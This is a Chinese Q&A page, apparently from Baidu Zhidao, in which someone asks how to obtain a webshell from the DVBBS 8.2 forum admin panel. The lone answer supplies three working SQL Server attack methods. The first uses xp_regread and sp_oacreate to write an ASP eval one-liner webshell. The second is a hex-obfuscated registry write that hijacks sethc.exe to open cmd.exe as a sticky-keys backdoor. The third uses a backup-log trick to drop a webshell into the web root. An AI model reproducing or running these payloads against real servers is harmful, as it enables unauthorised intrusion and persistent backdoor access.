DVBBS8.2后台怎么拿WEBSHELL?
1个回答
展开全部
拿webshell思路: 第一种: DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001 \Services\W3SVC\Parameters\Virtual Roots', '/' , @result output insert into web (gyfd) values(@result); update dv_user set useremail =@result where username='bugtest1'; 先把你个人的邮件地址修改成网站目录,然后再 declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, '上面得到的目录加木马地址', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '<%eval request("#")%>';-- 第二种: 映射劫持-5shift后门 declare @s varchar(4000) set @s=cast (0x657865632078705F72656777726974652027484B45595F4C4F43414C5F4D414348494E45272C27534F4654574152455C4D6963726F736F667 45C57696E646F7773204E545C43757272656E7456657273696F6E5C496D6167652046696C6520457865637574696F6E204F7074696F6E735C736 57468632E657865272C276465627567676572272C277265675F737A272C27633A5C77696E646F77735C73797374656D33325C636D642E6578652 7DA as varchar(4000));exec(@s); 第三种: 找到网站路径BAKLOG TO A webshell alter database XXX set RECOVERY FULL-- create table cmd (a image)-- backup log XXX to disk = 'c:\cmd' with init-- insert into cmd (a) values ('<%%25eval(request("a")):response.end%%25>')-- backup log XXX to disk = 'e:\web\test.asp'-- drop table cmd-- alter database XXX set RECOVERY SIMPLE-- 希望我的回答可你给你有所帮助,谢谢!
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询